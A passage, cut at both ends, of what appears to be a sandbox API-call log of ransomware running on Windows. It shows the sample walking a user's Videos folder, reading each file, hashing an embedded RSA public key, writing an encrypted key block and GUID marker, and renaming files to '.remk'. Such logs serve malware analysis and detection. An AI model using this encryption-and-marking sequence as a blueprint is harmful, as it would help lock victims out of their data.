ftLastWriteTime.dwLowDateTime=0x6a100cf0, ftLastWriteTime.dwHighDateTime=0x1d5db49, nFileSizeHigh=0x0, nFileSizeLow=0xadf0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6lJNlbKyK354Qa0.flv", cAlternateFileName="6LJNLB~1.FLV")) returned 1 [0234.549] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\6lJNlbKyK354Qa0.flv") returned=".flv" [0234.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\6lJNlbKyK354Qa0.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\6ljnlbkyk354qa0.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.550] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=44528) returned 1 [0234.550] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.552] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xadca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.552] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.554] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xadf0, lpOverlapped=0x0) returned 1 [0234.555] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.555] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.555] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.555] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.556] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.556] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.556] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.556] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.556] GetLastError () returned 0x0 [0234.557] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.557] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.557] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.557] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.557] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.557] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.558] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xadf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.558] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.558] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.558] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.558] CloseHandle (hObject=0x640) returned 1 [0234.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b0 [0234.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6420 | out: hHeap=0x630000) returned 1 [0234.562] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\6lJNlbKyK354Qa0.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\6ljnlbkyk354qa0.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\6lJNlbKyK354Qa0.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\6ljnlbkyk354qa0.flv.remk")) returned 1 [0234.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b0 | out: hHeap=0x630000) returned 1 [0234.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.563] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0234.566] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaacca340, ftCreationTime.dwHighDateTime=0x1d5db42, ftLastAccessTime.dwLowDateTime=0x41fec550, ftLastAccessTime.dwHighDateTime=0x1d5e5d8, ftLastWriteTime.dwLowDateTime=0x41fec550, ftLastWriteTime.dwHighDateTime=0x1d5e5d8, nFileSizeHigh=0x0, nFileSizeLow=0x18d67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JTSMdg7_.avi", cAlternateFileName="")) returned 1 [0234.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.566] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\JTSMdg7_.avi") returned=".avi" [0234.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\JTSMdg7_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\jtsmdg7_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.567] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=101735) returned 1 [0234.567] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.569] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x18d41, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.569] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.571] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.571] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x18d67, lpOverlapped=0x0) returned 1 [0234.573] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.573] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.573] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.573] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.574] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.574] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.574] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.574] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.574] GetLastError () returned 0x0 [0234.574] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.574] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.574] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.574] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.574] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18d70) returned 0x37c4278 [0234.575] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c530 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee838 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c578 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee850 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee880 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8e0 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee898 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.575] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee880 | out: hHeap=0x630000) returned 1 [0234.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee898 | out: hHeap=0x630000) returned 1 [0234.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8e0 | out: hHeap=0x630000) returned 1 [0234.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8e0 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee898 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee880 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee898 | out: hHeap=0x630000) returned 1 [0234.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee880 | out: hHeap=0x630000) returned 1 [0234.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8e0 | out: hHeap=0x630000) returned 1 [0234.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0234.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.576] GetCurrentThreadId () returned 0x314 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3760 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.577] GetCurrentThreadId () returned 0x314 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8e0 [0234.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee880 [0234.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0234.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee898 [0234.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee868 [0234.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8f8 [0234.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8c8 [0234.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8b0 [0234.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee910 [0234.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8b0 | out: hHeap=0x630000) returned 1 [0234.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee8b0 [0234.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8c8 | out: hHeap=0x630000) returned 1 [0234.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0234.579] HeapFree (in: 